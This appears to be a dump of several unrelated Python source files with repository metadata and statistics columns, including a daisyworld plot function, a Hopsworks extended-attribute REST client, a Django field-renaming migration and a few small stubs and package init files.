name="White daisies area",
line=dict(color="lavender", width=7),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Sw"] for x in xeqinv],
# name="White daisies area (backwards)",
# line=dict(color="lightskyblue", dash="dot", width=5),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[100 * x["Sb"] for x in xeq],
name="Black daisies area",
line=dict(color="black", width=3),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Sb"] for x in xeqinv],
# name="Black daisies area (backwards)",
# line=dict(color="darkslategray", dash="dot", width=3),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[100 * x["Su"] for x in xeq],
name="Uninhabited area",
line=dict(color="saddlebrown", width=3),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Su"] for x in xeqinv],
# name="Uninhabited area (backwards)",
# line=dict(color="sienna", dash="dot", width=3),
# ),
# )
fig.update_xaxes(title="Simulation Time [Myr]", range=[0, times[-1]])
fig.update_yaxes(
title="Inhabited area [%]",
range=[0, 100],
secondary_y=False,
)
fig.update_yaxes(title_text="Solar flux [Wm-2]", secondary_y=True)
fig.update_layout(title_text="Equilibrium area vs solar flux")
fig.update_layout(plot_bgcolor="silver")
return fig
| 30.022113
| 87
| 0.554301
| 1,620
| 12,219
| 4.053086
| 0.129012
| 0.046604
| 0.039598
| 0.062138
| 0.84237
| 0.811301
| 0.764088
| 0.734389
| 0.702863
| 0.652604
| 0
| 0.031647
| 0.304362
| 12,219
| 406
| 88
| 30.096059
| 0.740824
| 0.186431
| 0
| 0.657895
| 0
| 0
| 0.10986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016447
| false
| 0
| 0.016447
| 0
| 0.049342
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e64e9265798874238fe8da1d312e841fe0ab8876
| 36
|
py
|
Python
|
opendart/config/__init__.py
|
JehunYoo/opendart
|
c88105baf85af57d006cc2404d192aaf9baf73cc
|
[
"MIT"
] | null | null | null |
opendart/config/__init__.py
|
JehunYoo/opendart
|
c88105baf85af57d006cc2404d192aaf9baf73cc
|
[
"MIT"
] | 2
|
2021-07-12T10:59:20.000Z
|
2021-07-13T02:06:27.000Z
|
opendart/config/__init__.py
|
JehunYoo/opendart
|
c88105baf85af57d006cc2404d192aaf9baf73cc
|
[
"MIT"
] | null | null | null |
from opendart.config.config import *
| 36
| 36
| 0.833333
| 5
| 36
| 6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 36
| 1
| 36
| 36
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e6622feade344255592fd9a7d47d6b9f1bd055ff
| 5,732
|
py
|
Python
|
hops/xattr.py
|
robzor92/hops-util-py
|
88540a0c2b4e366fe6d2acb0441cea9378150c01
|
[
"Apache-2.0"
] | 24
|
2018-09-20T17:56:43.000Z
|
2021-11-11T23:34:43.000Z
|
hops/xattr.py
|
robzor92/hops-util-py
|
88540a0c2b4e366fe6d2acb0441cea9378150c01
|
[
"Apache-2.0"
] | 39
|
2018-10-04T15:19:07.000Z
|
2021-12-23T10:50:33.000Z
|
hops/xattr.py
|
robzor92/hops-util-py
|
88540a0c2b4e366fe6d2acb0441cea9378150c01
|
[
"Apache-2.0"
] | 23
|
2018-09-18T07:51:56.000Z
|
2021-08-10T12:10:27.000Z
|
"""
API for attaching, detaching, and reading extended metadata to HopsFS files/directories.
It uses the Hopsworks /xattrs REST API
"""
from hops import constants, util, hdfs
from hops.exceptions import RestAPIError
import urllib
def set_xattr(hdfs_path, xattr_name, value):
"""
Attach an extended attribute to an hdfs_path
Args:
:hdfs_path: path of a file or directory
:xattr_name: name of the extended attribute
:value: value of the extended attribute
Returns:
None
"""
value = str(value)
hdfs_path = urllib.parse.quote(hdfs._expand_path(hdfs_path))
headers = {constants.HTTP_CONFIG.HTTP_CONTENT_TYPE: constants.HTTP_CONFIG.HTTP_APPLICATION_JSON}
method = constants.HTTP_CONFIG.HTTP_PUT
resource_url = constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_REST_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_PROJECT_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs.project_id() + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_XATTR_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs_path + constants.DELIMITERS.QUESTION_MARK_DELIMITER + constants.XATTRS.XATTRS_PARAM_NAME + \
constants.DELIMITERS.JDBC_CONNECTION_STRING_VALUE_DELIMITER + xattr_name
response = util.send_request(method, resource_url, data=value, headers=headers)
response_object = response.json()
if response.status_code >= 400:
error_code, error_msg, user_msg = util._parse_rest_error(response_object)
raise RestAPIError("Could not attach extened attributes from a path (url: {}), server response: \n " \
"HTTP code: {}, HTTP reason: {}, error code: {}, error msg: {}, user msg: {}".format(
resource_url, response.status_code, response.reason, error_code, error_msg, user_msg))
def get_xattr(hdfs_path, xattr_name=None):
"""
Get the extended attribute attached to an hdfs_path.
Args:
:hdfs_path: path of a file or directory
:xattr_name: name of the extended attribute
Returns:
A dictionary with the extended attribute(s) as key value pair(s). If the :xattr_name is None,
the API returns all associated extended attributes.
"""
hdfs_path = urllib.parse.quote(hdfs._expand_path(hdfs_path))
headers = {constants.HTTP_CONFIG.HTTP_CONTENT_TYPE: constants.HTTP_CONFIG.HTTP_APPLICATION_JSON}
method = constants.HTTP_CONFIG.HTTP_GET
resource_url = constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_REST_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_PROJECT_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs.project_id() + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_XATTR_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs_path
if xattr_name is not None:
resource_url += constants.DELIMITERS.QUESTION_MARK_DELIMITER + constants.XATTRS.XATTRS_PARAM_NAME + \
constants.DELIMITERS.JDBC_CONNECTION_STRING_VALUE_DELIMITER + xattr_name
response = util.send_request(method, resource_url, headers=headers)
response_object = response.json()
if response.status_code >= 400:
error_code, error_msg, user_msg = util._parse_rest_error(response_object)
raise RestAPIError("Could not get extened attributes attached to a path (url: {}), server response: \n " \
"HTTP code: {}, HTTP reason: {}, error code: {}, error msg: {}, user msg: {}".format(
resource_url, response.status_code, response.reason, error_code, error_msg, user_msg))
results = {}
for item in response_object["items"]:
results[item["name"]] = item["value"]
return results
def remove_xattr(hdfs_path, xattr_name):
"""
Remove an extended attribute attached to an hdfs_path
Args:
:hdfs_path: path of a file or directory
:xattr_name: name of the extended attribute
Returns:
None
"""
hdfs_path = urllib.parse.quote(hdfs._expand_path(hdfs_path))
headers = {constants.HTTP_CONFIG.HTTP_CONTENT_TYPE: constants.HTTP_CONFIG.HTTP_APPLICATION_JSON}
method = constants.HTTP_CONFIG.HTTP_DELETE
resource_url = constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_REST_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_PROJECT_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs.project_id() + constants.DELIMITERS.SLASH_DELIMITER + \
constants.REST_CONFIG.HOPSWORKS_XATTR_RESOURCE + constants.DELIMITERS.SLASH_DELIMITER + \
hdfs_path + constants.DELIMITERS.QUESTION_MARK_DELIMITER + constants.XATTRS.XATTRS_PARAM_NAME + \
constants.DELIMITERS.JDBC_CONNECTION_STRING_VALUE_DELIMITER + xattr_name
response = util.send_request(method, resource_url, headers=headers)
if response.status_code >= 400:
response_object = response.json()
error_code, error_msg, user_msg = util._parse_rest_error(response_object)
raise RestAPIError("Could not remove extened attributes from a path (url: {}), server response: \n " \
"HTTP code: {}, HTTP reason: {}, error code: {}, error msg: {}, user msg: {}".format(
resource_url, response.status_code, response.reason, error_code, error_msg, user_msg))
| 53.074074
| 116
| 0.694348
| 676
| 5,732
| 5.615385
| 0.161243
| 0.105111
| 0.094837
| 0.1304
| 0.846417
| 0.822972
| 0.813224
| 0.813224
| 0.813224
| 0.813224
| 0
| 0.002014
| 0.220516
| 5,732
| 108
| 117
| 53.074074
| 0.847583
| 0.14358
| 0
| 0.671875
| 0
| 0
| 0.10023
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046875
| false
| 0
| 0.046875
| 0
| 0.109375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0561ca0895bec1e2984e237afabbb565849b0693
| 140
|
py
|
Python
|
room/services.py
|
F4ever/dots
|
b893802a78d4c8c1054a2c75c80dc1dd27d51eac
|
[
"Apache-2.0"
] | null | null | null |
room/services.py
|
F4ever/dots
|
b893802a78d4c8c1054a2c75c80dc1dd27d51eac
|
[
"Apache-2.0"
] | 6
|
2020-06-05T20:10:02.000Z
|
2021-09-22T18:09:52.000Z
|
room/services.py
|
F4ever/dots
|
b893802a78d4c8c1054a2c75c80dc1dd27d51eac
|
[
"Apache-2.0"
] | null | null | null |
class RoomCalculationService:
def __init__(self, room_id):
self.room_id = room_id
def calculate_results(self):
pass
| 23.333333
| 32
| 0.678571
| 17
| 140
| 5.117647
| 0.588235
| 0.206897
| 0.229885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 140
| 6
| 33
| 23.333333
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.2
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
057b75bb649e28b716661271413ac2187e4d17f1
| 48
|
py
|
Python
|
game/data/components/__init__.py
|
UnidayStudio/Easy-2D-Game-Engine
|
1a8501cba538d7542b0e24bf64eead388085480f
|
[
"MIT"
] | 8
|
2019-12-15T22:32:30.000Z
|
2021-06-14T07:38:51.000Z
|
game/data/components/__init__.py
|
UnidayStudio/Easy-2D-Game-Engine
|
1a8501cba538d7542b0e24bf64eead388085480f
|
[
"MIT"
] | null | null | null |
game/data/components/__init__.py
|
UnidayStudio/Easy-2D-Game-Engine
|
1a8501cba538d7542b0e24bf64eead388085480f
|
[
"MIT"
] | 2
|
2020-09-10T17:34:23.000Z
|
2021-03-11T09:26:26.000Z
|
from game.data.components.TestComponent import *
| 48
| 48
| 0.854167
| 6
| 48
| 6.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 48
| 1
| 48
| 48
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
058c253ae43e29116887b045dfd233f62ef4ccf0
| 218
|
py
|
Python
|
cpab/cpaNd/model/__init__.py
|
freifeld/cpabDiffeo
|
22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6
|
[
"MIT"
] | 17
|
2016-03-16T21:35:36.000Z
|
2021-11-11T04:16:21.000Z
|
cpab/cpaNd/model/__init__.py
|
freifeld/cpabDiffeo
|
22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6
|
[
"MIT"
] | null | null | null |
cpab/cpaNd/model/__init__.py
|
freifeld/cpabDiffeo
|
22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6
|
[
"MIT"
] | 4
|
2016-08-12T23:02:09.000Z
|
2019-03-14T18:20:36.000Z
|
from _LogLikelihood import LogLikelihood
from _LogPrior import LogPrior
#from _ScaleDependentLogLikelihoodGaussian import ScaleDependentLogLikelihoodGaussian
from _ScaleDependentLogPrior import ScaleDependentLogPrior
| 36.333333
| 85
| 0.917431
| 16
| 218
| 12.25
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077982
| 218
| 5
| 86
| 43.6
| 0.975124
| 0.385321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
552db8b8886012305a174d08f78e6a22fd0ea206
| 38
|
py
|
Python
|
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
from .base import BaseTestCase
pass
| 7.6
| 30
| 0.789474
| 5
| 38
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184211
| 38
| 4
| 31
| 9.5
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
5589cd912e691b17322bc09642b9a8ec0453acc9
| 8,949
|
py
|
Python
|
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | 1
|
2021-06-17T05:09:00.000Z
|
2021-06-17T05:09:00.000Z
|
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | null | null | null |
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-04 19:47
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('financial_activities', '0004_merge_20160928_1603'),
]
operations = [
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='by_direct_reimbursable_fun',
new_name='by_direct_reimbursable_funding_source',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='deobligations_recov_by_pro_cpe',
new_name='deobligations_recoveries_refund_pri_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obli_inc_by_prog_obj_class',
new_name='drv_obligations_incurred_by_program_object_class',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obligations_undel_ord_unp',
new_name='drv_obligations_undelivered_orders_unpaid',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_cpe',
new_name='gross_outlay_amount_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_fyb',
new_name='gross_outlay_amount_by_program_object_class_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_cpe',
new_name='gross_outlays_delivered_orders_paid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_fyb',
new_name='gross_outlays_delivered_orders_paid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_cpe',
new_name='gross_outlays_undelivered_orders_prepaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_fyb',
new_name='gross_outlays_undelivered_orders_prepaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_cpe',
new_name='obligations_delivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_fyb',
new_name='obligations_delivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_incurred_by_pr_cpe',
new_name='obligations_incurred_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_cpe',
new_name='obligations_undelivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_fyb',
new_name='obligations_undelivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_cpe',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_fyb',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_cpe',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_fyb',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483100_undelivered_or_cpe',
new_name='ussgl483100_undelivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483200_undelivered_or_cpe',
new_name='ussgl483200_undeliv_orders_oblig_transferred_prepaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487100_downward_adjus_cpe',
new_name='ussgl487100_down_adj_pri_unpaid_undel_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487200_downward_adjus_cpe',
new_name='ussgl487200_down_adj_pri_ppaid_undel_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488100_upward_adjustm_cpe',
new_name='ussgl488100_upward_adjust_pri_undeliv_order_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488200_upward_adjustm_cpe',
new_name='ussgl488200_up_adjust_pri_undeliv_order_oblig_ppaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_cpe',
new_name='ussgl490100_delivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_fyb',
new_name='ussgl490100_delivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490200_delivered_orde_cpe',
new_name='ussgl490200_delivered_orders_obligations_paid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_cpe',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_fyb',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl493100_delivered_orde_cpe',
new_name='ussgl493100_delivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497100_downward_adjus_cpe',
new_name='ussgl497100_down_adj_pri_unpaid_deliv_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497200_downward_adjus_cpe',
new_name='ussgl497200_down_adj_pri_paid_deliv_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498100_upward_adjustm_cpe',
new_name='ussgl498100_upward_adjust_pri_deliv_orders_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498200_upward_adjustm_cpe',
new_name='ussgl498200_upward_adjust_pri_deliv_orders_oblig_paid_cpe',
),
]
| 46.853403
| 84
| 0.703766
| 761
| 8,949
| 7.680683
| 0.148489
| 0.125749
| 0.155689
| 0.179641
| 0.847562
| 0.782036
| 0.762361
| 0.695979
| 0.587682
| 0.559624
| 0
| 0.039611
| 0.229858
| 8,949
| 190
| 85
| 47.1
| 0.808474
| 0.007599
| 0
| 0.57377
| 1
| 0
| 0.505632
| 0.503379
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010929
| 0
| 0.027322
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5598265430fb84db260c24576996f2ee0f789ef1
| 27
|
py
|
Python
|
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 1
|
2021-05-15T19:59:04.000Z
|
2021-05-15T19:59:04.000Z
|
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | null | null | null |
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 2
|
2018-03-03T08:32:12.000Z
|
2019-08-22T11:55:53.000Z
|
def abbreviate():
pass
| 9
| 17
| 0.62963
| 3
| 27
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 27
| 2
| 18
| 13.5
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
55acdcacf4ba82a80f3cb7a16e721e05d9bb07b7
| 127
|
py
|
Python
|
knock-knock4/knockpy/__init__.py
|
abhinashjain/proxyfuzzer
|
9c372390afe4cd3d277bcaaeb289e4c8ef398e5e
|
[
"BSD-3-Clause"
] | 1
|
2017-03-14T21:16:43.000Z
|
2017-03-14T21:16:43.000Z
|
knock-knock4/knockpy/__init__.py
|
abhinashjain/proxyfuzzer
|
9c372390afe4cd3d277bcaaeb289e4c8ef398e5e
|
[
"BSD-3-Clause"
] | 1
|
2016-12-19T16:35:53.000Z
|
2016-12-22T19:40:30.000Z
|
knock-knock4/knockpy/__init__.py
|
abhinashjain/proxyfuzzer
|
9c372390afe4cd3d277bcaaeb289e4c8ef398e5e
|
[
"BSD-3-Clause"
] | 2
|
2018-06-15T02:00:49.000Z
|
2021-09-08T19:15:35.000Z
|
import os
_ROOT = os.path.abspath(os.path.dirname(__file__))
def get_data(path):
return os.path.join(_ROOT, 'wordlist', path)
| 25.4
| 50
| 0.748031
| 21
| 127
| 4.190476
| 0.619048
| 0.204545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094488
| 127
| 4
| 51
| 31.75
| 0.765217
| 0
| 0
| 0
| 0
| 0
| 0.062992
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
55bbc7c595e31e90737d59f74df6dbd5b4ab1f77
| 121
|
py
|
Python
|
api_v2/views.py
|
LonelVino/club-chinois-home
|
3e2ecc6728f0b7349adfe10e515e3f5908d09c9d
|
[
"MIT"
] | null | null | null |
api_v2/views.py
|
LonelVino/club-chinois-home
|
3e2ecc6728f0b7349adfe10e515e3f5908d09c9d
|
[
"MIT"
] | null | null | null |
api_v2/views.py
|
LonelVino/club-chinois-home
|
3e2ecc6728f0b7349adfe10e515e3f5908d09c9d
|
[
"MIT"
] | null | null | null |
from django.http import JsonResponse
def names(request):
return JsonResponse({'names': ['William', 'Rod', 'Grant']})
| 30.25
| 63
| 0.702479
| 14
| 121
| 6.071429
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123967
| 121
| 4
| 63
| 30.25
| 0.801887
| 0
| 0
| 0
| 0
| 0
| 0.165289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
e9b3ab19d9a17d4244b5f5d4ce4ee01f10101503
| 399
|
py
|
Python
|
multiobj_rationale/fuseprop/__init__.py
|
binghong-ml/multiobj-rationale
|
735916854fba1886730ecac306dd509e930d67bd
|
[
"MIT"
] | 1
|
2021-08-17T00:43:11.000Z
|
2021-08-17T00:43:11.000Z
|
multiobj_rationale/fuseprop/__init__.py
|
binghong-ml/multiobj-rationale
|
735916854fba1886730ecac306dd509e930d67bd
|
[
"MIT"
] | null | null | null |
multiobj_rationale/fuseprop/__init__.py
|
binghong-ml/multiobj-rationale
|
735916854fba1886730ecac306dd509e930d67bd
|
[
"MIT"
] | 1
|
2021-08-17T00:43:12.000Z
|
2021-08-17T00:43:12.000Z
|
from multiobj_rationale.fuseprop.mol_graph import MolGraph
from multiobj_rationale.fuseprop.vocab import common_atom_vocab
from multiobj_rationale.fuseprop.gnn import AtomVGNN
from multiobj_rationale.fuseprop.dataset import *
from multiobj_rationale.fuseprop.chemutils import find_clusters, random_subgraph, extract_subgraph, enum_subgraph, dual_random_subgraph, unique_rationales, merge_rationales
| 66.5
| 172
| 0.892231
| 51
| 399
| 6.666667
| 0.490196
| 0.176471
| 0.308824
| 0.426471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065163
| 399
| 5
| 173
| 79.8
| 0.911528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
